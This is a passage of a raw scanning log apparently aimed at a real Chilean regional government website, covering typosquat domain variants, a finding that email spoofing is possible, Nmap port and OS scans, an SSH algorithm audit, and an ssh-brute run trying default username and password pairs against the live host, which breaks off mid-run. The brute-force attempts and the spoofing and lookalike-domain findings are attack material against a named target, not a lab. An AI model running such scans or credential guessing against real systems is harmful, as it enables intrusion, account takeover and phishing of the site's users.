1800Double Character Replacement eew.dellibertador.cl ? cl
1801Double Character Replacement qqw.dellibertador.cl ? cl
1802Double Character Replacement wee.dellibertador.cl ? cl
1803Double Character Replacement wqq.dellibertador.cl ? cl
1804Double Character Replacement www.dekkibertador.cl ? cl
1805Character Insertion weww.dellibertador.cl ? cl
1806Character Insertion wqww.dellibertador.cl ? cl
1807Character Insertion wwew.dellibertador.cl ? cl
1808Character Insertion wwqw.dellibertador.cl ? cl
1809Character Insertion www.delklibertador.cl ? cl
1810Character Insertion www.delliberetador.cl ? cl
1811Character Insertion www.dellibertadfor.cl ? cl
1812Character Insertion www.dellibertadoir.cl ? cl
1813Character Insertion www.dellibertadopr.cl ? cl
1814Character Insertion www.dellibertadore.cl ? cl
1815Character Insertion www.dellibertadort.cl ? cl
1816Character Insertion www.dellibertadsor.cl ? cl
1817Character Insertion www.dellibertasdor.cl ? cl
1818Character Insertion www.dellibertrador.cl ? cl
1819Character Insertion www.dellibertyador.cl ? cl
1820Character Insertion www.dellibewrtador.cl ? cl
1821Character Insertion www.dellibnertador.cl ? cl
1822Character Insertion www.dellibvertador.cl ? cl
1823Character Insertion www.delliobertador.cl ? cl
1824Character Insertion www.delliubertador.cl ? cl
1825Character Insertion www.dellkibertador.cl ? cl
1826Character Insertion www.derllibertador.cl ? cl
1827Character Insertion www.dewllibertador.cl ? cl
1828Character Insertion www.dfellibertador.cl ? cl
1829Character Insertion www.dsellibertador.cl ? cl
1830Character Insertion wwwe.dellibertador.cl ? cl
1831Character Insertion wwwq.dellibertador.cl ? cl
1832Missing Dot wwwwww.dellibertador.cl ? cl
1833Singular or Pluralise dellibertador.cl 200.54.230.247 CL,CHILE magic-02.tdata.cloud cl
1834Singular or Pluralise dellibertadors.cl ? cl
1835Vowel Swap www.dallibartador.cl ? cl
1836Vowel Swap www.dellabertador.cl ? cl
1837Vowel Swap www.dellebertador.cl ? cl
1838Vowel Swap www.dellibertadar.cl ? cl
1839Vowel Swap www.dellibertader.cl ? cl
1840Vowel Swap www.dellibertadur.cl ? cl
1841Vowel Swap www.dellibertedor.cl ? cl
1842Vowel Swap www.dellibertidor.cl ? cl
1843Vowel Swap www.dellibertodor.cl ? cl
1844Vowel Swap www.dellibertudor.cl ? cl
1845Vowel Swap www.dillibirtador.cl ? cl
1846Vowel Swap www.dollibortador.cl ? cl
1847Vowel Swap www.dulliburtador.cl ? cl
1848Homophones www.dellayebertador.cl ? cl
1849Homophones www.delleyebertador.cl ? cl
1850Homophones www.dellibertadewr.cl ? cl
1851Homophones www.dellibertadieur.cl ? cl
1852Homophones www.dellibertadoar.cl ? cl
1853Homophones www.dellibertaduer.cl ? cl
1854Bit Flipping 7ww.dellibertador.cl ? cl
1855Bit Flipping gww.dellibertador.cl ? cl
1856Bit Flipping sww.dellibertador.cl ? cl
1857Bit Flipping uww.dellibertador.cl ? cl
1858Bit Flipping vww.dellibertador.cl ? cl
1859Bit Flipping w7w.dellibertador.cl ? cl
1860Bit Flipping wgw.dellibertador.cl ? cl
1861Bit Flipping wsw.dellibertador.cl ? cl
1862Bit Flipping wuw.dellibertador.cl ? cl
1863Bit Flipping wvw.dellibertador.cl ? cl
1864Bit Flipping ww7.dellibertador.cl ? cl
1865Bit Flipping wwg.dellibertador.cl ? cl
1866Bit Flipping wws.dellibertador.cl ? cl
1867Bit Flipping wwu.dellibertador.cl ? cl
1868Bit Flipping wwv.dellibertador.cl ? cl
1869Bit Flipping www.dallibertador.cl ? cl
1870Bit Flipping www.ddllibertador.cl ? cl
1871Bit Flipping www.dedlibertador.cl ? cl
1872Bit Flipping www.dehlibertador.cl ? cl
1873Bit Flipping www.deldibertador.cl ? cl
1874Bit Flipping www.delhibertador.cl ? cl
1875Bit Flipping www.dellhbertador.cl ? cl
1876Bit Flipping www.dellibartador.cl ? cl
1877Bit Flipping www.dellibdrtador.cl ? cl
1878Bit Flipping www.dellibe2tador.cl ? cl
1879Bit Flipping www.dellibebtador.cl ? cl
1880Bit Flipping www.dellibeptador.cl ? cl
1881Bit Flipping www.delliber4ador.cl ? cl
1882Bit Flipping www.delliberdador.cl ? cl
1883Bit Flipping www.delliberpador.cl ? cl
1884Bit Flipping www.dellibertadgr.cl ? cl
1885Bit Flipping www.dellibertadkr.cl ? cl
1886Bit Flipping www.dellibertadmr.cl ? cl
1887Bit Flipping www.dellibertadnr.cl ? cl
1888Bit Flipping www.dellibertado2.cl ? cl
1889Bit Flipping www.dellibertadob.cl ? cl
1890Bit Flipping www.dellibertadop.cl ? cl
1891Bit Flipping www.dellibertador.cd ? cd
1892Bit Flipping www.dellibertador.ch ? ch
1893Bit Flipping www.dellibertador.cm ? cm
1894Bit Flipping www.dellibertador.cn ? cn
1895Bit Flipping www.dellibertador.gl ? gl
1896Bit Flipping www.dellibertador.sl ? sl
1897Bit Flipping www.dellibertados.cl ? cl
1898Bit Flipping www.dellibertadov.cl ? cl
1899Bit Flipping www.dellibertadoz.cl ? cl
1900Bit Flipping www.dellibertaeor.cl ? cl
1901Bit Flipping www.dellibertalor.cl ? cl
1902Bit Flipping www.dellibertator.cl ? cl
1903Bit Flipping www.dellibertcdor.cl ? cl
1904Bit Flipping www.dellibertqdor.cl ? cl
1905Bit Flipping www.delliberuador.cl ? cl
1906Bit Flipping www.dellibervador.cl ? cl
1907Bit Flipping www.dellibestador.cl ? cl
1908Bit Flipping www.dellibevtador.cl ? cl
1909Bit Flipping www.dellibeztador.cl ? cl
1910Bit Flipping www.dellibgrtador.cl ? cl
1911Bit Flipping www.dellibmrtador.cl ? cl
1912Bit Flipping www.delliburtador.cl ? cl
1913Bit Flipping www.dellicertador.cl ? cl
1914Bit Flipping www.dellifertador.cl ? cl
1915Bit Flipping www.dellijertador.cl ? cl
1916Bit Flipping www.dellirertador.cl ? cl
1917Bit Flipping www.dellkbertador.cl ? cl
1918Bit Flipping www.dellmbertador.cl ? cl
1919Bit Flipping www.dellybertador.cl ? cl
1920Bit Flipping www.delmibertador.cl ? cl
1921Bit Flipping www.delnibertador.cl ? cl
1922Bit Flipping www.demlibertador.cl ? cl
1923Bit Flipping www.denlibertador.cl ? cl
1924Bit Flipping www.dgllibertador.cl ? cl
1925Bit Flipping www.dmllibertador.cl ? cl
1926Bit Flipping www.dullibertador.cl ? cl
1927Bit Flipping www.eellibertador.cl ? cl
1928Bit Flipping www.lellibertador.cl ? cl
1929Bit Flipping www.tellibertador.cl ? cl
1930Bit Flipping wwwndellibertador.cl ? cl
1931Homoglyphs vvvvvv.dellibertador.cl ? cl
1932Homoglyphs vvvvw.dellibertador.cl ? cl
1933Homoglyphs vvwvv.dellibertador.cl ? cl
1934Homoglyphs vvww.dellibertador.cl ? cl
1935Homoglyphs wvvvv.dellibertador.cl ? cl
1936Homoglyphs wvvw.dellibertador.cl ? cl
1937Homoglyphs wwvv.dellibertador.cl ? cl
1938Homoglyphs www.clellibertaclor.cl ? cl
1939Homoglyphs www.clellibertador.cl ? cl
1940Homoglyphs www.de11ibertador.cl ? cl
1941Homoglyphs www.de1libertador.cl ? cl
1942Homoglyphs www.del1ibertador.cl ? cl
1943Homoglyphs www.dellibertaclor.cl ? cl
1944Homoglyphs www.dellibertad0r.cl ? cl
1945Homoglyphs www.delllbertador.cl ? cl
1946Wrong TLD dellibertador.ca ? ca
1947Wrong TLD dellibertador.ch ? ch
1948Wrong TLD dellibertador.com 50.63.202.56 US,UNITED STATES com
1949Wrong TLD dellibertador.de ? de
1950Wrong TLD dellibertador.edu ? edu
1951Wrong TLD dellibertador.es ? es
1952Wrong TLD dellibertador.fr ? fr
1953Wrong TLD dellibertador.it ? it
1954Wrong TLD dellibertador.jp ? jp
1955Wrong TLD dellibertador.net ? net
1956Wrong TLD dellibertador.nl ? nl
1957Wrong TLD dellibertador.no ? no
1958Wrong TLD dellibertador.org ? org
1959Wrong TLD dellibertador.ru ? ru
1960Wrong TLD dellibertador.se ? se
1961Wrong TLD dellibertador.us ? us
1962#####################################################################################################################################
1963 [x] Error downloading /advanced_search
1964[3/25] http://www.dellibertador.cl/documentos/plan_descontaminacion_atmosferica_2014_DS15.pdf
1965 [x] Error in the parsing process
1966[4/25] http://www.dellibertador.cl/documentos/2013/dec_ex_2440_elecciones_15dic.pdf
1967 [x] Error in the parsing process
1968[5/25] http://www.dellibertador.cl/diplan/2016/informe_oficio_inicio_EAE.pdf
1969 [x] Error in the parsing process
1970[6/25] http://www.dellibertador.cl/fic/2013/estrategia_regional_innovacion_region_ohiggins.pdf
1971 [x] Error in the parsing process
1972[7/25] http://www.dellibertador.cl/documentos/2018/resoluciones_exentas/0743.pdf
1973 [x] Error in the parsing process
1974[8/25] http://www.dellibertador.cl/documentos/2014/resoluciones_exentas/0347.pdf
1975 [x] Error in the parsing process
1976[9/25] https://www.dellibertador.cl/core/actas/2017/acta_ordinaria_561.pdf
1977 [x] Error in the parsing process
1978[10/25] http://www.dellibertador.cl/documentos/2016/resoluciones_exentas/0830.pdf
1979 [x] Error in the parsing process
1980[11/25] https://www.dellibertador.cl/core/acuerdos/2019/acuerdo_6001.pdf
1981 [x] Error in the parsing process
1982[12/25] http://www.dellibertador.cl/documentos/2018/resoluciones_exentas/0352.pdf
1983 [x] Error in the parsing process
1984[13/25] http://www.dellibertador.cl/documentos/2018/resoluciones_exentas/0265.pdf
1985 [x] Error in the parsing process
1986[14/25] https://www.dellibertador.cl/core/acuerdos/2012/acuerdo_3490.pdf
1987 [x] Error in the parsing process
1988[15/25] http://www.dellibertador.cl/fic/2013/resolucion_277_aprueba_procedimientos_provision_FIC-2013.pdf
1989 [x] Error in the parsing process
1990[16/25] http://www.dellibertador.cl/core/acuerdos/2016/acuerdo_4707.pdf
1991 [x] Error in the parsing process
1992[17/25] http://www.dellibertador.cl/documentos/2018/resoluciones_exentas/0168.pdf
1993 [x] Error in the parsing process
1994[18/25] http://www.dellibertador.cl/documentos/2012/resoluciones_exentas/0358.PDF
1995 [x] Error in the parsing process
1996[19/25] http://www.dellibertador.cl/documentos/2018/resoluciones_exentas/0167.pdf
1997 [x] Error in the parsing process
1998[20/25] https://www.dellibertador.cl/core/acuerdos/2019/acuerdo_5941.pdf
1999 [x] Error in the parsing process
2000[21/25] https://www.dellibertador.cl/d3/images/fril/placa_gore_core_2020.pdf
2001[22/25] https://www.dellibertador.cl/core/acuerdos/2019/acuerdo_6086.pdf
2002 [x] Error in the parsing process
2003[23/25] https://www.dellibertador.cl/core/acuerdos/2019/acuerdo_6000.pdf
2004 [x] Error in the parsing process
2005[24/25] https://www.dellibertador.cl/core/acuerdos/2019/acuerdo_6211.pdf
2006 [x] Error in the parsing process
2007[25/25] https://www.dellibertador.cl/core/acuerdos/2019/acuerdo_6065.pdf
2008 [x] Error in the parsing process
2009####################################################################################################################################
2010[+] www.dellibertador.cl has no SPF record!
2011[*] No DMARC record found. Looking for organizational record
2012[+] No organizational DMARC record
2013[+] Spoofing possible for www.dellibertador.cl!
2014####################################################################################################################################
2015WARNING: Duplicate port number(s) specified. Are you alert enough to be using Nmap? Have some coffee or Jolt(tm).
2016Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 16:50 EDT
2017Nmap scan report for www.dellibertador.cl (200.54.230.247)
2018Host is up (0.44s latency).
2019rDNS record for 200.54.230.247: plesk.tdata.cloud
2020Not shown: 460 filtered ports, 22 closed ports
2021Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
2022PORT STATE SERVICE
202321/tcp open ftp
202422/tcp open ssh
202525/tcp open smtp
202653/tcp open domain
202780/tcp open http
2028110/tcp open pop3
2029143/tcp open imap
2030443/tcp open https
2031465/tcp open smtps
2032587/tcp open submission
2033993/tcp open imaps
2034995/tcp open pop3s
20358443/tcp open https-alt
20368880/tcp open cddbp-alt
2037
2038Nmap done: 1 IP address (1 host up) scanned in 11.47 seconds
2039####################################################################################################################################
2040Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 16:50 EDT
2041Nmap scan report for www.dellibertador.cl (200.54.230.247)
2042Host is up (0.41s latency).
2043rDNS record for 200.54.230.247: plesk.tdata.cloud
2044Not shown: 14 filtered ports
2045PORT STATE SERVICE
204653/udp open|filtered domain
2047
2048Nmap done: 1 IP address (1 host up) scanned in 15.17 seconds
2049#####################################################################################################################################
2050Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 16:51 EDT
2051NSE: Loaded 54 scripts for scanning.
2052NSE: Script Pre-scanning.
2053Initiating NSE at 16:51
2054Completed NSE at 16:51, 0.00s elapsed
2055Initiating NSE at 16:51
2056Completed NSE at 16:51, 0.00s elapsed
2057Initiating Parallel DNS resolution of 1 host. at 16:51
2058Completed Parallel DNS resolution of 1 host. at 16:51, 0.02s elapsed
2059Initiating SYN Stealth Scan at 16:51
2060Scanning www.dellibertador.cl (200.54.230.247) [1 port]
2061Discovered open port 21/tcp on 200.54.230.247
2062Completed SYN Stealth Scan at 16:51, 0.50s elapsed (1 total ports)
2063Initiating Service scan at 16:51
2064Scanning 1 service on www.dellibertador.cl (200.54.230.247)
2065Completed Service scan at 16:51, 12.35s elapsed (1 service on 1 host)
2066Initiating OS detection (try #1) against www.dellibertador.cl (200.54.230.247)
2067Retrying OS detection (try #2) against www.dellibertador.cl (200.54.230.247)
2068Initiating Traceroute at 16:51
2069Completed Traceroute at 16:51, 3.35s elapsed
2070Initiating Parallel DNS resolution of 15 hosts. at 16:51
2071Completed Parallel DNS resolution of 15 hosts. at 16:51, 1.31s elapsed
2072NSE: Script scanning 200.54.230.247.
2073Initiating NSE at 16:51
2074NSE Timing: About 70.83% done; ETC: 16:53 (0:00:30 remaining)
2075Completed NSE at 16:53, 90.83s elapsed
2076Initiating NSE at 16:53
2077Completed NSE at 16:53, 0.05s elapsed
2078Nmap scan report for www.dellibertador.cl (200.54.230.247)
2079Host is up (0.46s latency).
2080rDNS record for 200.54.230.247: plesk.tdata.cloud
2081
2082PORT STATE SERVICE VERSION
208321/tcp open ftp ProFTPD
2084Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2085Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
2086No exact OS matches for host (test conditions non-ideal).
2087Uptime guess: 2.023 days (since Tue Mar 10 16:19:46 2020)
2088Network Distance: 19 hops
2089TCP Sequence Prediction: Difficulty=259 (Good luck!)
2090IP ID Sequence Generation: All zeros
2091
2092TRACEROUTE (using port 21/tcp)
2093HOP RTT ADDRESS
20941 230.20 ms 10.202.5.1
20952 343.85 ms unn-84-17-52-126.cdn77.com (84.17.52.126)
20963 343.87 ms hu0-1-0-2.rcr51.b021037-0.zrh02.atlas.cogentco.com (149.11.89.129)
20974 343.89 ms be3591.ccr51.zrh02.atlas.cogentco.com (130.117.50.182)
20985 343.90 ms be3072.ccr21.muc03.atlas.cogentco.com (130.117.0.18)
20996 343.92 ms be2959.ccr41.fra03.atlas.cogentco.com (154.54.36.53)
21007 343.94 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
21018 343.94 ms telefonica.fra03.atlas.cogentco.com (130.117.14.118)
21029 343.96 ms 176.52.248.119
210310 343.96 ms 94.142.119.153
210411 344.60 ms 176.52.248.54
210512 351.65 ms 5.53.7.171
210613 ...
210714 351.65 ms nap96lflo02.lo0.red.lflo.nap.movistar.cl (200.91.0.6)
210815 351.64 ms pe24tolp01.Vl466.lflo.internacional.ce.nap.movistar.cl (186.148.62.118)
210916 ... 18
211019 465.44 ms plesk.tdata.cloud (200.54.230.247)
2111
2112NSE: Script Post-scanning.
2113Initiating NSE at 16:53
2114Completed NSE at 16:53, 0.00s elapsed
2115Initiating NSE at 16:53
2116Completed NSE at 16:53, 0.00s elapsed
2117####################################################################################################################################
2118# general
2119(gen) banner: SSH-2.0-OpenSSH_7.4
2120(gen) software: OpenSSH 7.4
2121(gen) compatibility: OpenSSH 7.3+ (some functionality from 6.6), Dropbear SSH 2016.73+ (some functionality from 0.52)
2122(gen) compression: enabled (zlib@openssh.com)
2123
2124# key exchange algorithms
2125(kex) curve25519-sha256 -- [warn] unknown algorithm
2126(kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
2127(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
2128 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2129(kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
2130 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2131(kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
2132 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2133(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
2134 `- [info] available since OpenSSH 4.4
2135(kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
2136(kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
2137(kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2138 `- [warn] using weak hashing algorithm
2139 `- [info] available since OpenSSH 2.3.0
2140(kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
2141(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
2142 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
2143(kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2144 `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
2145 `- [warn] using small 1024-bit modulus
2146 `- [warn] using weak hashing algorithm
2147 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
2148
2149# host-key algorithms
2150(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
2151(key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
2152(key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
2153(key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
2154 `- [warn] using weak random number generator could reveal the key
2155 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2156(key) ssh-ed25519 -- [info] available since OpenSSH 6.5
2157
2158# encryption algorithms (ciphers)
2159(enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
2160 `- [info] default cipher since OpenSSH 6.9.
2161(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
2162(enc) aes192-ctr -- [info] available since OpenSSH 3.7
2163(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
2164(enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
2165(enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
2166(enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2167 `- [warn] using weak cipher mode
2168 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
2169(enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2170 `- [warn] using weak cipher mode
2171 `- [info] available since OpenSSH 2.3.0
2172(enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2173 `- [warn] using weak cipher mode
2174 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
2175(enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2176 `- [fail] disabled since Dropbear SSH 0.53
2177 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2178 `- [warn] using weak cipher mode
2179 `- [warn] using small 64-bit block size
2180 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
2181(enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2182 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2183 `- [warn] using weak cipher mode
2184 `- [warn] using small 64-bit block size
2185 `- [info] available since OpenSSH 2.1.0
2186(enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2187 `- [warn] using weak cipher
2188 `- [warn] using weak cipher mode
2189 `- [warn] using small 64-bit block size
2190 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
2191
2192# message authentication code algorithms
2193(mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
2194 `- [info] available since OpenSSH 6.2
2195(mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
2196(mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
2197(mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
2198(mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
2199 `- [info] available since OpenSSH 6.2
2200(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
2201 `- [warn] using small 64-bit tag size
2202 `- [info] available since OpenSSH 4.7
2203(mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
2204 `- [info] available since OpenSSH 6.2
2205(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
2206 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
2207(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
2208 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
2209(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
2210 `- [warn] using weak hashing algorithm
2211 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
2212
2213# algorithm recommendations (for OpenSSH 7.4)
2214(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
2215(rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
2216(rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
2217(rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
2218(rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
2219(rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
2220(rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
2221(rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
2222(rec) -blowfish-cbc -- enc algorithm to remove
2223(rec) -3des-cbc -- enc algorithm to remove
2224(rec) -aes256-cbc -- enc algorithm to remove
2225(rec) -cast128-cbc -- enc algorithm to remove
2226(rec) -aes192-cbc -- enc algorithm to remove
2227(rec) -aes128-cbc -- enc algorithm to remove
2228(rec) -hmac-sha2-512 -- mac algorithm to remove
2229(rec) -umac-128@openssh.com -- mac algorithm to remove
2230(rec) -hmac-sha2-256 -- mac algorithm to remove
2231(rec) -umac-64@openssh.com -- mac algorithm to remove
2232(rec) -hmac-sha1 -- mac algorithm to remove
2233(rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
2234(rec) -umac-64-etm@openssh.com -- mac algorithm to remove
2235#####################################################################################################################################
2236Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 16:53 EDT
2237NSE: Loaded 51 scripts for scanning.
2238NSE: Script Pre-scanning.
2239Initiating NSE at 16:53
2240Completed NSE at 16:53, 0.00s elapsed
2241Initiating NSE at 16:53
2242Completed NSE at 16:53, 0.00s elapsed
2243Initiating Parallel DNS resolution of 1 host. at 16:53
2244Completed Parallel DNS resolution of 1 host. at 16:53, 0.02s elapsed
2245Initiating SYN Stealth Scan at 16:53
2246Scanning www.dellibertador.cl (200.54.230.247) [1 port]
2247Discovered open port 22/tcp on 200.54.230.247
2248Completed SYN Stealth Scan at 16:53, 0.39s elapsed (1 total ports)
2249Initiating Service scan at 16:53
2250Scanning 1 service on www.dellibertador.cl (200.54.230.247)
2251Completed Service scan at 16:53, 0.70s elapsed (1 service on 1 host)
2252Initiating OS detection (try #1) against www.dellibertador.cl (200.54.230.247)
2253Retrying OS detection (try #2) against www.dellibertador.cl (200.54.230.247)
2254Initiating Traceroute at 16:54
2255Completed Traceroute at 16:54, 3.35s elapsed
2256Initiating Parallel DNS resolution of 14 hosts. at 16:54
2257Completed Parallel DNS resolution of 14 hosts. at 16:54, 0.79s elapsed
2258NSE: Script scanning 200.54.230.247.
2259Initiating NSE at 16:54
2260NSE: [ssh-run 200.54.230.247:22] Failed to specify credentials and command to run.
2261NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: root:root
2262NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: admin:admin
2263NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: administrator:administrator
2264NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: webadmin:webadmin
2265NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: sysadmin:sysadmin
2266NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: netadmin:netadmin
2267NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: guest:guest
2268NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: user:user
2269NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: web:web
2270NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: test:test
2271NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: root:
2272NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: admin:
2273NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: administrator:
2274NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: webadmin:
2275NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: sysadmin:
2276NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: netadmin:
2277NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: guest:
2278NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: user:
2279NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: web:
2280NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: test:
2281NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: root:123456
2282NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: admin:123456
2283NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: administrator:123456
2284NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: webadmin:123456
2285NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: sysadmin:123456
2286NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: netadmin:123456
2287NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: guest:123456
2288NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: user:123456
2289NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: web:123456
2290NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: test:123456
2291NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: root:12345
2292NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: admin:12345
2293NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: administrator:12345
2294NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: webadmin:12345
2295NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: sysadmin:12345
2296NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: netadmin:12345
2297NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: guest:12345
2298NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: user:12345
2299NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: web:12345
2300NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: test:12345
2301NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: root:123456789
2302NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: admin:123456789
2303NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: administrator:123456789
2304NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: webadmin:123456789
2305NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: sysadmin:123456789
2306NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: netadmin:123456789
2307NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: guest:123456789
2308NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: user:123456789
2309NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: web:123456789
2310NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: test:123456789
2311NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: root:password
2312NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: admin:password
2313NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: administrator:password
2314NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: webadmin:password
2315NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: sysadmin:password
2316NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: netadmin:password
2317NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: guest:password
2318NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: user:password
2319NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: web:password
2320NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: test:password
2321NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: root:iloveyou
2322NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: admin:iloveyou
2323NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: administrator:iloveyou
2324NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: webadmin:iloveyou
2325NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: sysadmin:iloveyou
2326NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: netadmin:iloveyou
2327NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: guest:iloveyou
2328NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: user:iloveyou
